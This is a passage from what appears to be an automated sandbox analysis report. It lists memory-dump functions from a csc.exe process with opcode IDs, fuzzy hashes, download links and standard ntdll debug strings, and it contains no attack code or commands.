                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
                                                                                                                                                                                                                                                                                  • Instruction ID: aafb230f76bf22d03d0768b2e7e21e24ce9badd0b4d276a70240bfc5d21b5d50
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 369f009082050829a275a7bbe12d1f068ebee6e8ca6735a7f0af70988af87659
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ABE0ED33244615ABCB265A1ADC08F22FB69FF80B71F018A2AE91943590CA61EC11CAE0
                                                                                                                                                                                                                                                                                  Function 05C60630 Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                                                                                                                                                                                                                  • Instruction ID: 0cec4ee880a812727a4cde284deb9db8eb0adf14c5d606e331c2bc49acb9f98a
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7fb8b229e0179ed1d94183841a0f137a63d66d46d99527f7ccba905b47740c18
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78F0A9762083449BDB06CF16D088AE57BADBB85760F000895EC06AB301DA71EA81CB96
                                                                                                                                                                                                                                                                                  Function 05C62500 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 89b79f6f66cbf5186f0e884718d3cf990ded24a090c483d82bd84af94ae08494
                                                                                                                                                                                                                                                                                  • Instruction ID: b81dcf0dff84e4ee4caf53c370f882a791a7dfe2557ffdc021aa583a6b1dcecb
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89b79f6f66cbf5186f0e884718d3cf990ded24a090c483d82bd84af94ae08494
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2E0D8322006549BC721FB18DC89F9BBB9AEF90365F004915F116575A0CB30EE10E7C4
                                                                                                                                                                                                                                                                                  Function 05C581EB Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                                                                                                                                                                                                  • Instruction ID: a280ad4e260c1b500fb6d5c01f68412a18ce67380f0bd4fe5be935da9678caaa
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10E0C232240565EFDB316B61DC08F627AA6FF40B24F300D6AF486068A48BB49CC1EB4C
                                                                                                                                                                                                                                                                                  Function 05C5B502 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                                                                                                                                                                                                                  • Instruction ID: cd6abb1278853719972c1ac024e6dc6bfc9db4ff8ed6d431e242acdf6c6e97ce
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CD05E32251A50AACB3A2F14ED0DF927AB5EF40F24F050D28B146168F0C6A1ED84E695
                                                                                                                                                                                                                                                                                  Function 05CDE588 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                                                                                                                                                                                                  • Instruction ID: b1763b86062c85b2d91247983d442169708443eca961d556c5e6ceea6f55edba
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03E08C35A406849FCB12EB49C684F5AB7B9BB80B80F180804A1099F660D224EA00DB40
                                                                                                                                                                                                                                                                                  Function 05C9E4BC Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                                                                                                                                                                                                  • Instruction ID: 19b7e5a8719738cd1080d845642a35464896539718389c6405029ace59bc2619
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37D0A932204650ABC732AA1CFC00FD373E9BB8CB21F020859B108C7050C3A4EC81D680
                                                                                                                                                                                                                                                                                  Function 05C9A750 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                                                                                                                                                                                                  • Instruction ID: 1910b05bb72467551fc37e126109874e3333c779427e6dd47a1b10e116649f50
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DD012371D054CBBCB119F65DC01F957BA9E794B60F044420B504875A0CA7AE950E584
                                                                                                                                                                                                                                                                                  Function 05C9C620 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                                                                                                                                                                                                  • Instruction ID: 9c0e365d6313b7ea72b362f130f4ab4984acf4187bd0534cf0cfb95a82d601a1
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24C01232250648AFC7119A94CD01F0177A9E798B00F000421F20447570C571E810E684
                                                                                                                                                                                                                                                                                  Function 05C701C0 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                                                                                                                                                                                                  • Instruction ID: 9626b77a5c7e138a944bf7f24239b80447ee6d526446c92e81df67a42b28a740
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C4D0C935312D80CFCA1ACB1CC8A4B1533A4BB44B40F8148D0E801CBB22D22CDA40CA00
                                                                                                                                                                                                                                                                                  Function 05C60670 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                                                                                                                                                                                                  • Instruction ID: 5340e0a41fee8a97d43493ddf3099b651d99137477fbf856d2bbe958ab7f6906
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19C04C757415408FDF15CB19C284F597BE8FB44B40F150CD0E815CBB21D664ED00DA11
                                                                                                                                                                                                                                                                                  Function 05CA4570 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: aa4ba0151a1291ed55168c2d9988536efbf850c8d2c1990a1ec5adc5de859b1d
                                                                                                                                                                                                                                                                                  • Instruction ID: 33f6298181699192734b69314adf5d9bf0bb5832646881547210f4c4f1a9bbbc
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa4ba0151a1291ed55168c2d9988536efbf850c8d2c1990a1ec5adc5de859b1d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA9002A1A0110043554071584944486601997E1305BD1C919A0544564CC6698C55A269
                                                                                                                                                                                                                                                                                  Function 05CA34E0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 64e9e44be56d92e9e73de3fe8105e6a6633ae45020d07956aa6029b8fa8e427a
                                                                                                                                                                                                                                                                                  • Instruction ID: 48d9145f0c6c612a5de4d79b96fcafbc6c4c8921fbef6218ed9e658d8d767213
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 64e9e44be56d92e9e73de3fe8105e6a6633ae45020d07956aa6029b8fa8e427a
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF900271A0510403E50061584654786101987D0205FA1CC15A041456CDC7E68D5175A2
                                                                                                                                                                                                                                                                                  Function 05C97550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05CD4460
                                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05CD4507
                                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 05CD4592
                                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05CD4530
                                                                                                                                                                                                                                                                                  • Execute=1, xrefs: 05CD451E
                                                                                                                                                                                                                                                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05CD454D
                                                                                                                                                                                                                                                                                  • ExecuteOptions, xrefs: 05CD44AB
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                                                                                                  • API String ID: 0-484625025
                                                                                                                                                                                                                                                                                  • Opcode ID: 14e1296c797057223f3ca4464a771b3602811138c887a6255d0a3d99b7e2a07b
                                                                                                                                                                                                                                                                                  • Instruction ID: 0ad7546221bb4d254adbbce8d552968416468cc9ce50a9d7ba63e94c410cf5e6
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14e1296c797057223f3ca4464a771b3602811138c887a6255d0a3d99b7e2a07b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF510631A152597ADF18EAA4DC8DFE977A9EF45304F040CA9E606A7180EB709B41DFA0